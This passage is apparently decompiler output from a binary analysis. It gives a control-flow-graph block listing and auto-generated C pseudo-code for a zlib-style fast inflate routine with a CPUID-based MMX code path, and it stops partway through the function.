                                                                                                                                                  control_flow_graph 429 d3840-d38d6 430 d38d8-d38f8 429->430 431 d38fa-d3900 429->431 432 d3912 430->432 431->432 433 d3902-d3910 431->433 434 d3916-d391d 432->434 433->431 435 d3bac-d3bc9 434->435 436 d3923 434->436 439 d3bcc-d3bd2 435->439 437 d3925-d3939 436->437 438 d3990-d3993 436->438 440 d397f 437->440 441 d393b-d3945 437->441 444 d3995-d39a0 438->444 445 d39a2-d39ab 438->445 442 d3bd4-d3be3 439->442 443 d3be6-d3bef 439->443 448 d3989-d398d 440->448 441->440 446 d3947-d394d 441->446 442->443 447 d3bf2-d3bfc 443->447 444->445 449 d39ae-d39b6 445->449 446->440 450 d394f-d3955 446->450 451 d3bfe-d3c01 447->451 452 d3c17-d3c1e 447->452 448->434 453 d39b8-d39bb 449->453 454 d39d1-d39da 449->454 450->440 457 d3957-d3967 450->457 458 d3c02-d3c06 451->458 459 d3d04-d3d06 452->459 460 d3c24-d3c27 452->460 461 d39bc-d39c0 453->461 455 d3ad4-d3ad6 454->455 456 d39e0-d39e3 454->456 466 d3adc-d3aef 455->466 467 d3dea-d3dec 455->467 464 d3a0a-d3a11 456->464 465 d39e5-d39e7 456->465 457->440 468 d3969-d396f 457->468 462 d3c0c-d3c10 458->462 463 d3e28-d3e2f 458->463 459->467 469 d3d0c-d3d21 459->469 470 d3c3d-d3c43 460->470 471 d3c29-d3c3b 460->471 461->463 472 d39c6-d39ca 461->472 462->439 473 d3c12 462->473 480 d3e31 463->480 481 d3e33-d3e56 463->481 478 d3a20-d3a2a 464->478 479 d3a13-d3a1e 464->479 474 d39e9-d39f8 465->474 475 d39fa-d3a08 465->475 466->449 482 d3dee-d3df8 467->482 483 d3dfa-d3e04 467->483 476 d3971 468->476 477 d3973-d397d 468->477 469->447 484 d3c45-d3c54 470->484 485 d3c57-d3c64 470->485 471->470 472->438 486 d39cc 472->486 473->463 474->475 475->464 476->440 477->448 490 d3a2d-d3a3c 478->490 479->478 480->481 488 d3e6c-d3e7d 481->488 489 d3e58-d3e68 481->489 491 d3e16-d3e1c 482->491 483->491 484->485 487 d3c67-d3c76 485->487 486->463 492 d3c7c-d3c7f 487->492 493 d3d28-d3d2a 487->493 496 d3e7f-d3e85 488->496 497 d3e87-d3e92 488->497 489->488 494 d3af4-d3af6 490->494 495 d3a42-d3a45 490->495 498 d3e1e 491->498 499 d3e21-d3e26 491->499 500 d3cd8-d3cdb 492->500 501 d3c81-d3c93 492->501 503 d3dde-d3de8 493->503 504 d3d30-d3d49 493->504 502 d3afc-d3b0f 494->502 494->503 507 d3aac-d3aaf 495->507 508 d3a47-d3a49 495->508 496->497 505 d3e9e-d3ea5 497->505 506 d3e94-d3e9c 497->506 498->499 499->463 512 d3c95-d3ca1 500->512 513 d3cdd-d3ce1 500->513 501->512 502->490 503->491 504->487 514 d3d50-d3d5e 504->514 509 d3ea8-d3eae 505->509 506->509 510 d3a6e-d3a7a 507->510 511 d3ab1-d3ab5 507->511 515 d3a5c-d3a6c 508->515 516 d3a4b-d3a5a 508->516 522 d3ebd-d3ec7 509->522 523 d3eb0-d3ebb 509->523 524 d3b14-d3b22 510->524 525 d3a80-d3aa7 510->525 511->510 517 d3ab7-d3acf 511->517 512->514 518 d3ca7-d3cd0 512->518 513->512 521 d3ce3-d3cfd 513->521 519 d3d64-d3d6b 514->519 520 d3e06-d3e14 514->520 515->510 516->515 517->461 518->458 527 d3d8d-d3d93 519->527 528 d3d6d-d3d73 519->528 520->491 521->458 526 d3eca-d3ed2 522->526 523->526 524->520 529 d3b28-d3b2f 524->529 525->461 534 d3dbd-d3dc3 527->534 535 d3d95-d3da1 527->535 530 d3dcd-d3dd9 528->530 531 d3d75-d3d7d 528->531 532 d3b55-d3b5b 529->532 533 d3b31-d3b3b 529->533 530->458 531->530 540 d3b5d-d3b6d 532->540 541 d3b89-d3b93 532->541 538 d3b9d-d3ba5 533->538 539 d3b3d-d3b45 533->539 534->530 537 d3dc5-d3dcb 534->537 535->530 536 d3da3-d3db1 535->536 536->530 544 d3db3-d3dbb 536->544 537->530 538->461 538->463 539->538 540->538 542 d3b6f-d3b7d 540->542 541->538 543 d3b95-d3b9b 541->543 542->538 545 d3b7f-d3b87 542->545 543->538 544->530 545->538
                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                  			E000D3840() {
                                                                                                                                                  				signed int _t162;
                                                                                                                                                  				unsigned int _t170;
                                                                                                                                                  				unsigned int _t171;
                                                                                                                                                  				signed int _t172;
                                                                                                                                                  				signed int _t174;
                                                                                                                                                  				signed int _t176;
                                                                                                                                                  				signed int _t177;
                                                                                                                                                  				signed int _t180;
                                                                                                                                                  				signed int _t182;
                                                                                                                                                  				unsigned int _t183;
                                                                                                                                                  				int _t184;
                                                                                                                                                  				int _t192;
                                                                                                                                                  				signed char _t198;
                                                                                                                                                  				signed int _t205;
                                                                                                                                                  				signed int _t206;
                                                                                                                                                  				signed int _t207;
                                                                                                                                                  				int _t208;
                                                                                                                                                  				int _t220;
                                                                                                                                                  				signed int _t225;
                                                                                                                                                  				signed int _t233;
                                                                                                                                                  				signed int _t248;
                                                                                                                                                  				signed char _t249;
                                                                                                                                                  				unsigned int _t250;
                                                                                                                                                  				signed char _t251;
                                                                                                                                                  				signed int* _t252;
                                                                                                                                                  				signed int _t255;
                                                                                                                                                  				signed int _t256;
                                                                                                                                                  				signed int _t257;
                                                                                                                                                  				signed int _t262;
                                                                                                                                                  				intOrPtr _t267;
                                                                                                                                                  				signed char _t274;
                                                                                                                                                  				signed int _t275;
                                                                                                                                                  				char* _t276;
                                                                                                                                                  				signed int _t278;
                                                                                                                                                  				signed char _t280;
                                                                                                                                                  				signed int _t283;
                                                                                                                                                  				signed int _t287;
                                                                                                                                                  				int _t288;
                                                                                                                                                  				int _t289;
                                                                                                                                                  				int _t292;
                                                                                                                                                  				int _t294;
                                                                                                                                                  				int _t298;
                                                                                                                                                  				signed int _t301;
                                                                                                                                                  				signed char _t307;
                                                                                                                                                  				signed char _t308;
                                                                                                                                                  				signed char _t311;
                                                                                                                                                  				signed char _t312;
                                                                                                                                                  				signed int _t314;
                                                                                                                                                  				int _t315;
                                                                                                                                                  				int _t316;
                                                                                                                                                  				signed char _t318;
                                                                                                                                                  				int _t320;
                                                                                                                                                  				int _t322;
                                                                                                                                                  				int _t326;
                                                                                                                                                  				signed int _t329;
                                                                                                                                                  				signed char _t332;
                                                                                                                                                  				signed char _t333;
                                                                                                                                                  				signed char _t335;
                                                                                                                                                  				int _t337;
                                                                                                                                                  				signed int _t343;
                                                                                                                                                  				int _t345;
                                                                                                                                                  				intOrPtr _t346;
                                                                                                                                                  				intOrPtr _t347;
                                                                                                                                                  				unsigned int _t352;
                                                                                                                                                  				unsigned int _t357;
                                                                                                                                                  				signed int _t360;
                                                                                                                                                  				signed int _t361;
                                                                                                                                                  				intOrPtr _t362;
                                                                                                                                                  				void* _t363;
                                                                                                                                                  				intOrPtr* _t374;
                                                                                                                                                  				void* _t375;
                                                                                                                                                  				intOrPtr* _t383;
                                                                                                                                                  				void* _t384;
                                                                                                                                                  				signed int _t389;
                                                                                                                                                  				void* _t390;
                                                                                                                                                  				signed int _t391;
                                                                                                                                                  				void* _t396;
                                                                                                                                                  				void* _t398;
                                                                                                                                                  				intOrPtr* _t405;
                                                                                                                                                  				void* _t406;
                                                                                                                                                  				signed int _t407;
                                                                                                                                                  				void* _t409;
                                                                                                                                                  				intOrPtr* _t416;
                                                                                                                                                  				void* _t417;
                                                                                                                                                  				unsigned int _t422;
                                                                                                                                                  				signed int _t423;
                                                                                                                                                  				void* _t425;
                                                                                                                                                  				signed int* _t426;
                                                                                                                                                  				void* _t430;
                                                                                                                                                  
                                                                                                                                                  				asm("pushfd");
                                                                                                                                                  				_t426 = _t425 - 0x40;
                                                                                                                                                  				asm("cld");
                                                                                                                                                  				_t389 = _t426[0x16];
                                                                                                                                                  				_t362 =  *((intOrPtr*)(_t389 + 0x1c));
                                                                                                                                                  				_t162 =  *_t389;
                                                                                                                                                  				_t426[0xb] = _t162;
                                                                                                                                                  				_t426[5] =  *((intOrPtr*)(_t389 + 4)) + _t162 - 0xb;
                                                                                                                                                  				_t267 =  *((intOrPtr*)(_t389 + 0x10));
                                                                                                                                                  				_t248 =  *(_t389 + 0xc);
                                                                                                                                                  				_t426[0xf] = _t248;
                                                                                                                                                  				_t426[0xa] =  ~(_t426[0x17] - _t267) + _t248;
                                                                                                                                                  				_t426[4] = _t267 - 0x101 + _t248;
                                                                                                                                                  				_t426[2] =  *(_t362 + 0x4c);
                                                                                                                                                  				_t426[3] =  *(_t362 + 0x50);
                                                                                                                                                  				 *_t426 = (1 <<  *(_t362 + 0x54)) - 1;
                                                                                                                                                  				_t426[1] = (1 <<  *(_t362 + 0x58)) - 1;
                                                                                                                                                  				_t170 =  *(_t362 + 0x28);
                                                                                                                                                  				_t343 =  *(_t362 + 0x34);
                                                                                                                                                  				_t426[0xd] = _t170;
                                                                                                                                                  				_t426[0xc] =  *(_t362 + 0x30);
                                                                                                                                                  				_t426[0xe] = _t343;
                                                                                                                                                  				_t422 =  *(_t362 + 0x38);
                                                                                                                                                  				_t249 =  *(_t362 + 0x3c);
                                                                                                                                                  				_t390 = _t426[0xb];
                                                                                                                                                  				_t274 = _t426[5];
                                                                                                                                                  				if(_t274 > _t390) {
                                                                                                                                                  					L2:
                                                                                                                                                  					if((_t390 & 0x00000003) != 0) {
                                                                                                                                                  						_t390 = _t390 + 1;
                                                                                                                                                  						_t274 = _t249;
                                                                                                                                                  						_t249 = _t249 + 8;
                                                                                                                                                  						_t170 = 0 << _t274;
                                                                                                                                                  						_t422 = _t422 | _t170;
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  					goto L4;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t337 = _t274 + 0xb - _t390;
                                                                                                                                                  					_t170 = memset(_t390 + _t337 + _t337, 0, memcpy( &(_t426[7]), _t390, _t337) << 0);
                                                                                                                                                  					_t426 =  &(_t426[6]);
                                                                                                                                                  					_t274 = 0;
                                                                                                                                                  					_t390 =  &(_t426[7]);
                                                                                                                                                  					_t426[5] = _t390;
                                                                                                                                                  					L4:
                                                                                                                                                  					_t363 = _t426[0xf];
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t430 =  *0xd8010 - 2;
                                                                                                                                                  						if(_t430 == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t430 > 0) {
                                                                                                                                                  							do {
                                                                                                                                                  								if(_t249 <= 0xf) {
                                                                                                                                                  									asm("lodsw");
                                                                                                                                                  									_t318 = _t249;
                                                                                                                                                  									_t249 = _t249 + 0x10;
                                                                                                                                                  									_t422 = _t423 | 0 << _t318;
                                                                                                                                                  								}
                                                                                                                                                  								_t171 =  *(_t426[2] + ( *_t426 & _t422) * 4);
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t250 = _t249 - _t171;
                                                                                                                                                  									_t423 = _t422 >> _t171;
                                                                                                                                                  									if(_t171 == 0) {
                                                                                                                                                  										asm("stosb");
                                                                                                                                                  										goto L22;
                                                                                                                                                  									}
                                                                                                                                                  									_t352 = _t171 >> 0x10;
                                                                                                                                                  									_t307 = _t171;
                                                                                                                                                  									if((_t171 & 0x00000010) == 0) {
                                                                                                                                                  										if((_t171 & 0x00000040) != 0) {
                                                                                                                                                  											L97:
                                                                                                                                                  											if((_t171 & 0x00000020) == 0) {
                                                                                                                                                  												_t276 = "invalid literal/length code";
                                                                                                                                                  												_t346 = 0x1a;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t276 = 0;
                                                                                                                                                  												_t346 = 0xb;
                                                                                                                                                  											}
                                                                                                                                                  											L101:
                                                                                                                                                  											_t172 = _t426[0x16];
                                                                                                                                                  											if(_t276 != 0) {
                                                                                                                                                  												 *(_t172 + 0x18) = _t276;
                                                                                                                                                  											}
                                                                                                                                                  											 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x1c)))) = _t346;
                                                                                                                                                  											goto L104;
                                                                                                                                                  										}
                                                                                                                                                  										_t171 =  *(_t426[2] + (((0x00000001 << _t307) - 0x00000001 & _t423) + _t352) * 4);
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									_t308 = _t307 & 0x0000000f;
                                                                                                                                                  									if(_t308 != 0) {
                                                                                                                                                  										if(_t250 < _t308) {
                                                                                                                                                  											asm("lodsw");
                                                                                                                                                  											_t335 = _t250;
                                                                                                                                                  											_t250 = _t250 + 0x10;
                                                                                                                                                  											_t423 = _t423 | 0 << _t335;
                                                                                                                                                  											_t308 = _t335;
                                                                                                                                                  										}
                                                                                                                                                  										_t250 = _t250 - _t308;
                                                                                                                                                  										_t233 = (0x00000001 << _t308) - 0x00000001 & _t423;
                                                                                                                                                  										_t423 = _t423 >> _t308;
                                                                                                                                                  										_t352 = _t352 + _t233;
                                                                                                                                                  									}
                                                                                                                                                  									_t426[6] = _t352;
                                                                                                                                                  									if(_t250 <= 0xf) {
                                                                                                                                                  										asm("lodsw");
                                                                                                                                                  										_t333 = _t250;
                                                                                                                                                  										_t250 = _t250 + 0x10;
                                                                                                                                                  										_t423 = _t423 | 0 << _t333;
                                                                                                                                                  									}
                                                                                                                                                  									_t198 =  *(_t426[3] + (_t426[1] & _t423) * 4);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t357 = _t198 >> 0x10;
                                                                                                                                                  										_t250 = _t250 - _t198;
                                                                                                                                                  										_t423 = _t423 >> _t198;
                                                                                                                                                  										_t311 = _t198;
                                                                                                                                                  										if((_t198 & 0x00000010) != 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										if((_t198 & 0x00000040) != 0) {
                                                                                                                                                  											L96:
                                                                                                                                                  											_t276 = "invalid distance code";
                                                                                                                                                  											_t346 = 0x1a;
                                                                                                                                                  											goto L101;
                                                                                                                                                  										}
                                                                                                                                                  										_t198 =  *(_t426[3] + (((0x00000001 << _t311) - 0x00000001 & _t423) + _t357) * 4);
                                                                                                                                                  									}
                                                                                                                                                  									_t312 = _t311 & 0x0000000f;
                                                                                                                                                  									if(_t312 == 0) {
                                                                                                                                                  										if(_t357 != 1 || _t426[0xa] == _t363) {
                                                                                                                                                  											L38:
                                                                                                                                                  											_t426[0xb] = _t390;
                                                                                                                                                  											_t205 = _t363 - _t426[0xa];
                                                                                                                                                  											if(_t205 < _t357) {
                                                                                                                                                  												_t206 = _t426[0xd];
                                                                                                                                                  												_t314 =  ~_t205;
                                                                                                                                                  												_t407 = _t426[0xe];
                                                                                                                                                  												if(_t206 < _t357) {
                                                                                                                                                  													L100:
                                                                                                                                                  													_t390 = _t426[0xb];
                                                                                                                                                  													_t276 = "invalid distance too far back";
                                                                                                                                                  													_t346 = 0x1a;
                                                                                                                                                  													goto L101;
                                                                                                                                                  												}
                                                                                                                                                  												_t315 = _t314 + _t357;
                                                                                                                                                  												if(_t426[0xc] != 0) {
                                                                                                                                                  													_t207 = _t426[0xc];
                                                                                                                                                  													if(_t315 <= _t207) {
                                                                                                                                                  														_t409 = _t407 + _t207 - _t315;
                                                                                                                                                  														_t208 = _t426[6];
                                                                                                                                                  														if(_t208 > _t315) {
                                                                                                                                                  															_t208 = memcpy(_t363, _t409, _t315);
                                                                                                                                                  															_t426 =  &(_t426[3]);
                                                                                                                                                  															_t363 = _t409 + _t315 + _t315;
                                                                                                                                                  															_t409 = _t363 - _t357;
                                                                                                                                                  														}
                                                                                                                                                  													} else {
                                                                                                                                                  														_t409 = _t407 + _t426[0xd] + _t207 - _t315;
                                                                                                                                                  														_t320 = _t315 - _t207;
                                                                                                                                                  														_t208 = _t426[6];
                                                                                                                                                  														if(_t208 > _t320) {
                                                                                                                                                  															_t208 = memcpy(_t363, _t409, _t320);
                                                                                                                                                  															_t426 =  &(_t426[3]);
                                                                                                                                                  															_t363 = _t409 + _t320 + _t320;
                                                                                                                                                  															_t409 = _t426[0xe];
                                                                                                                                                  															_t322 = _t426[0xc];
                                                                                                                                                  															if(_t208 > _t322) {
                                                                                                                                                  																_t208 = memcpy(_t363, _t409, _t322);
                                                                                                                                                  																_t426 =  &(_t426[3]);
                                                                                                                                                  																_t363 = _t409 + _t322 + _t322;
                                                                                                                                                  																_t409 = _t363 - _t357;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												} else {
                                                                                                                                                  													_t409 = _t407 + _t206 - _t315;
                                                                                                                                                  													_t208 = _t426[6];
                                                                                                                                                  													if(_t208 > _t315) {
                                                                                                                                                  														_t208 = memcpy(_t363, _t409, _t315);
                                                                                                                                                  														_t426 =  &(_t426[3]);
                                                                                                                                                  														_t363 = _t409 + _t315 + _t315;
                                                                                                                                                  														_t409 = _t363 - _t357;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												_t316 = _t208;
                                                                                                                                                  												memcpy(_t363, _t409, _t316);
                                                                                                                                                  												_t426 =  &(_t426[3]);
                                                                                                                                                  												_t363 = _t409 + _t316 + _t316;
                                                                                                                                                  												_t390 = _t426[0xb];
                                                                                                                                                  												goto L22;
                                                                                                                                                  											}
                                                                                                                                                  											_t416 = _t363 - _t357;
                                                                                                                                                  											_t326 = _t426[6] - 3;
                                                                                                                                                  											 *_t363 =  *_t416;
                                                                                                                                                  											_t417 = _t416 + 3;
                                                                                                                                                  											 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t416 + 1));
                                                                                                                                                  											 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t416 + 2));
                                                                                                                                                  											memcpy(_t363 + 3, _t417, _t326);
                                                                                                                                                  											_t426 =  &(_t426[3]);
                                                                                                                                                  											_t363 = _t417 + _t326 + _t326;
                                                                                                                                                  											_t390 = _t426[0xb];
                                                                                                                                                  										} else {
                                                                                                                                                  											_t383 = _t363 - 1;
                                                                                                                                                  											_t220 =  *_t383;
                                                                                                                                                  											_t329 = _t426[6] - 3;
                                                                                                                                                  											 *(_t383 + 1) = _t220;
                                                                                                                                                  											 *(_t383 + 2) = _t220;
                                                                                                                                                  											 *(_t383 + 3) = _t220;
                                                                                                                                                  											_t384 = _t383 + 4;
                                                                                                                                                  											memset(_t384, _t220, _t329 << 0);
                                                                                                                                                  											_t426 =  &(_t426[3]);
                                                                                                                                                  											_t363 = _t384 + _t329;
                                                                                                                                                  										}
                                                                                                                                                  										goto L22;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t250 < _t312) {
                                                                                                                                                  										asm("lodsw");
                                                                                                                                                  										_t332 = _t250;
                                                                                                                                                  										_t250 = _t250 + 0x10;
                                                                                                                                                  										_t423 = _t423 | 0 << _t332;
                                                                                                                                                  										_t312 = _t332;
                                                                                                                                                  									}
                                                                                                                                                  									_t250 = _t250 - _t312;
                                                                                                                                                  									_t225 = (0x00000001 << _t312) - 0x00000001 & _t423;
                                                                                                                                                  									_t423 = _t423 >> _t312;
                                                                                                                                                  									_t357 = _t357 + _t225;
                                                                                                                                                  									goto L38;
                                                                                                                                                  								}
                                                                                                                                                  								L22:
                                                                                                                                                  							} while (_t426[4] > _t363 && _t426[5] > _t390);
                                                                                                                                                  							L104:
                                                                                                                                                  							if( *0xd8010 == 2) {
                                                                                                                                                  								_t250 = _t423;
                                                                                                                                                  							}
                                                                                                                                                  							_t174 = _t426[0x16];
                                                                                                                                                  							_t347 =  *((intOrPtr*)(_t174 + 0x1c));
                                                                                                                                                  							_t278 = _t250 >> 3;
                                                                                                                                                  							_t391 = _t390 - _t278;
                                                                                                                                                  							_t251 = _t250 - (_t278 << 3);
                                                                                                                                                  							 *(_t174 + 0xc) = _t363;
                                                                                                                                                  							 *(_t347 + 0x3c) = _t251;
                                                                                                                                                  							_t280 = _t251;
                                                                                                                                                  							_t252 =  &(_t426[7]);
                                                                                                                                                  							if(_t426[5] == _t252) {
                                                                                                                                                  								_t262 =  *_t174;
                                                                                                                                                  								_t426[5] = _t262;
                                                                                                                                                  								_t391 = _t391 - _t252 + _t262;
                                                                                                                                                  								_t426[5] = _t426[5] +  *((intOrPtr*)(_t174 + 4)) - 0xb;
                                                                                                                                                  							}
                                                                                                                                                  							 *_t174 = _t391;
                                                                                                                                                  							_t255 = (1 << _t280) - 1;
                                                                                                                                                  							if( *0xd8010 == 2) {
                                                                                                                                                  								asm("psrlq mm0, mm1");
                                                                                                                                                  								asm("movd ebp, mm0");
                                                                                                                                                  								asm("emms");
                                                                                                                                                  							}
                                                                                                                                                  							 *(_t347 + 0x38) = _t423 & _t255;
                                                                                                                                                  							_t256 = _t426[5];
                                                                                                                                                  							if(_t256 <= _t391) {
                                                                                                                                                  								 *((intOrPtr*)(_t174 + 4)) =  ~(_t391 - _t256) + 0xb;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *((intOrPtr*)(_t174 + 4)) = _t256 - _t391 + 0xb;
                                                                                                                                                  							}
                                                                                                                                                  							_t257 = _t426[4];
                                                                                                                                                  							if(_t257 <= _t363) {
                                                                                                                                                  								 *((intOrPtr*)(_t174 + 0x10)) =  ~(_t363 - _t257) + 0x101;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *((intOrPtr*)(_t174 + 0x10)) = _t257 - _t363 + 0x101;
                                                                                                                                                  							}
                                                                                                                                                  							asm("popfd");
                                                                                                                                                  							return _t174;
                                                                                                                                                  						}
                                                                                                                                                  						_push(_t170);
                                                                                                                                                  						_push(_t249);
                                                                                                                                                  						_push(_t274);
                                                                                                                                                  						_push(_t343);
                                                                                                                                                  						asm("pushfd");
                                                                                                                                                  						 *_t426 =  *_t426 ^ 0x00200000;
                                                                                                                                                  						asm("popfd");
                                                                                                                                                  						asm("pushfd");
                                                                                                                                                  						_pop(_t360);
                                                                                                                                                  						_t361 = _t360 ^  *_t426;
                                                                                                                                                  						if(_t361 == 0) {
                                                                                                                                                  							L15:
                                                                                                                                                  							 *0xd8010 = 3;
                                                                                                                                                  							L16:
                                                                                                                                                  							_pop(_t343);
                                                                                                                                                  							_pop(_t274);
                                                                                                                                                  							_pop(_t249);
                                                                                                                                                  							_pop(_t170);
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						asm("cpuid");
                                                                                                                                                  						if(_t249 != 0x756e6547 || _t274 != 0x6c65746e || _t361 != 0x49656e69) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						} else {
                                                                                                                                                  							asm("cpuid");
                                                                                                                                                  							if(0xd != 6 || (_t361 & 0x00800000) == 0) {
                                                                                                                                                  								goto L15;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *0xd8010 = 2;
                                                                                                                                                  								goto L16;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					asm("emms");
                                                                                                                                                  					asm("movd mm0, ebp");
                                                                                                                                                  					_t423 = _t249;
                                                                                                                                                  					asm("movd mm4, dword [esp]");
                                                                                                                                                  					asm("movq mm3, mm4");
                                                                                                                                                  					asm("movd mm5, dword [esp+0x4]");
                                                                                                                                                  					asm("movq mm2, mm5");
                                                                                                                                                  					asm("pxor mm1, mm1");
                                                                                                                                                  					_t250 = _t426[2];
                                                                                                                                                  					do {
                                                                                                                                                  						asm("psrlq mm0, mm1");
                                                                                                                                                  						if(_t423 <= 0x20) {
                                                                                                                                                  							asm("movd mm6, ebp");
                                                                                                                                                  							asm("movd mm7, dword [esi]");
                                                                                                                                                  							_t390 = _t390 + 4;
                                                                                                                                                  							asm("psllq mm7, mm6");
                                                                                                                                                  							_t423 = _t423 + 0x20;
                                                                                                                                                  							asm("por mm0, mm7");
                                                                                                                                                  						}
                                                                                                                                                  						asm("pand mm4, mm0");
                                                                                                                                                  						asm("movd eax, mm4");
                                                                                                                                                  						asm("movq mm4, mm3");
                                                                                                                                                  						_t171 =  *(_t250 + _t170 * 4);
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t275 = _t171 & 0x000000ff;
                                                                                                                                                  							asm("movd mm1, ecx");
                                                                                                                                                  							_t423 = _t423 - _t275;
                                                                                                                                                  							if(_t171 == 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_t345 = _t171 >> 0x10;
                                                                                                                                                  							if((_t171 & 0x00000010) == 0) {
                                                                                                                                                  								if((_t171 & 0x00000040) != 0) {
                                                                                                                                                  									goto L97;
                                                                                                                                                  								}
                                                                                                                                                  								asm("psrlq mm0, mm1");
                                                                                                                                                  								asm("movd ecx, mm0");
                                                                                                                                                  								_t171 =  *(_t250 + ((_t275 &  *(0xd37bc + (_t171 & 0x0000000f) * 4)) + _t345) * 4);
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							_t176 = _t171 & 0x0000000f;
                                                                                                                                                  							if(_t176 != 0) {
                                                                                                                                                  								asm("psrlq mm0, mm1");
                                                                                                                                                  								asm("movd mm1, eax");
                                                                                                                                                  								asm("movd ecx, mm0");
                                                                                                                                                  								_t423 = _t423 - _t176;
                                                                                                                                                  								_t345 = _t345 + (_t275 &  *(0xd37bc + _t176 * 4));
                                                                                                                                                  							}
                                                                                                                                                  							asm("psrlq mm0, mm1");
                                                                                                                                                  							if(_t423 <= 0x20) {
                                                                                                                                                  								asm("movd mm6, ebp");
                                                                                                                                                  								asm("movd mm7, dword [esi]");
                                                                                                                                                  								_t390 = _t390 + 4;
                                                                                                                                                  								asm("psllq mm7, mm6");
                                                                                                                                                  								_t423 = _t423 + 0x20;
                                                                                                                                                  								asm("por mm0, mm7");
                                                                                                                                                  							}
                                                                                                                                                  							asm("pand mm5, mm0");
                                                                                                                                                  							asm("movd eax, mm5");
                                                                                                                                                  							asm("movq mm5, mm2");
                                                                                                                                                  							_t177 =  *(_t426[3] + _t176 * 4);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t283 = _t177 & 0x000000ff;
                                                                                                                                                  								_t250 = _t177 >> 0x10;
                                                                                                                                                  								_t423 = _t423 - _t283;
                                                                                                                                                  								asm("movd mm1, ecx");
                                                                                                                                                  								if((_t177 & 0x00000010) != 0) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								if((_t177 & 0x00000040) != 0) {
                                                                                                                                                  									goto L96;
                                                                                                                                                  								}
                                                                                                                                                  								asm("psrlq mm0, mm1");
                                                                                                                                                  								asm("movd ecx, mm0");
                                                                                                                                                  								_t177 =  *(_t426[3] + ((_t283 &  *(0xd37bc + (_t177 & 0x0000000f) * 4)) + _t250) * 4);
                                                                                                                                                  							}
                                                                                                                                                  							_t180 = _t177 & 0x0000000f;
                                                                                                                                                  							if(_t180 == 0) {
                                                                                                                                                  								if(_t250 != 1 || _t426[0xa] == _t363) {
                                                                                                                                                  									L76:
                                                                                                                                                  									_t426[0xb] = _t390;
                                                                                                                                                  									_t182 = _t363 - _t426[0xa];
                                                                                                                                                  									if(_t182 < _t250) {
                                                                                                                                                  										_t183 = _t426[0xd];
                                                                                                                                                  										_t287 =  ~_t182;
                                                                                                                                                  										_t396 = _t426[0xe];
                                                                                                                                                  										if(_t183 < _t250) {
                                                                                                                                                  											goto L100;
                                                                                                                                                  										}
                                                                                                                                                  										_t288 = _t287 + _t250;
                                                                                                                                                  										if(_t426[0xc] != 0) {
                                                                                                                                                  											_t184 = _t426[0xc];
                                                                                                                                                  											if(_t288 <= _t184) {
                                                                                                                                                  												_t398 = _t396 + _t184 - _t288;
                                                                                                                                                  												if(_t345 > _t288) {
                                                                                                                                                  													_t345 = _t345 - _t288;
                                                                                                                                                  													memcpy(_t363, _t398, _t288);
                                                                                                                                                  													_t426 =  &(_t426[3]);
                                                                                                                                                  													_t363 = _t398 + _t288 + _t288;
                                                                                                                                                  													_t398 = _t363 - _t250;
                                                                                                                                                  												}
                                                                                                                                                  											} else {
                                                                                                                                                  												_t398 = _t396 + _t426[0xd] + _t184 - _t288;
                                                                                                                                                  												_t292 = _t288 - _t184;
                                                                                                                                                  												if(_t345 > _t292) {
                                                                                                                                                  													_t345 = _t345 - _t292;
                                                                                                                                                  													memcpy(_t363, _t398, _t292);
                                                                                                                                                  													_t426 =  &(_t426[3]);
                                                                                                                                                  													_t363 = _t398 + _t292 + _t292;
                                                                                                                                                  													_t398 = _t426[0xe];
                                                                                                                                                  													_t294 = _t426[0xc];
                                                                                                                                                  													if(_t345 > _t294) {
                                                                                                                                                  														_t345 = _t345 - _t294;
                                                                                                                                                  														memcpy(_t363, _t398, _t294);
                                                                                                                                                  														_t426 =  &(_t426[3]);
                                                                                                                                                  														_t363 = _t398 + _t294 + _t294;
                                                                                                                                                  														_t398 = _t363 - _t250;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t398 = _t396 + _t183 - _t288;
                                                                                                                                                  											if(_t345 > _t288) {
                                                                                                                                                  												_t345 = _t345 - _t288;
                                                                                                                                                  												memcpy(_t363, _t398, _t288);
                                                                                                                                                  												_t426 =  &(_t426[3]);
                                                                                                                                                  												_t363 = _t398 + _t288 + _t288;
                                                                                                                                                  												_t398 = _t363 - _t250;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										_t289 = _t345;
                                                                                                                                                  										_t170 = memcpy(_t363, _t398, _t289);
                                                                                                                                                  										_t426 =  &(_t426[3]);
                                                                                                                                                  										_t363 = _t398 + _t289 + _t289;
                                                                                                                                                  										_t390 = _t426[0xb];
                                                                                                                                                  										_t250 = _t426[2];
                                                                                                                                                  										goto L64;
                                                                                                                                                  									}
                                                                                                                                                  									_t405 = _t363 - _t250;
                                                                                                                                                  									_t298 = _t345 - 3;
                                                                                                                                                  									 *_t363 =  *_t405;
